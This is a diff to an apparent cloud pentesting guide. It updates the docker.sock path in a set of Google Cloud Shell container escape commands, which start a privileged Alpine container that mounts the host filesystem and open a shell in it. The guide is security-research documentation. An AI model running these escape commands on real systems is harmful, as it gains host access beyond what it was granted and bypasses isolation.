f

Author: carlospolop

src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md

@@ -19,12 +19,14 @@ Note that the Google Cloud Shell runs inside a container, you can **easily escap
 <summary>Container escape commands</summary>
 
 ```bash
-sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
-sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
-sudo docker -H unix:///google/host/var/run/docker.sock start escaper
-sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh
+sudo docker -H unix:///run/docker.sock pull alpine:latest
+sudo docker -H unix:///run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
+sudo docker -H unix:///run/docker.sock start escaper
+sudo docker -H unix:///run/docker.sock exec -it escaper /bin/sh
 ```
 
+Note that previously the `docker.sock` file was located in `/google/host/var/run/docker.sock` but now it has been moved to `/run/docker.sock`.
+
 </details>
 
 This is not considered a vulnerability by google, but it gives you a wider vision of what is happening in that env.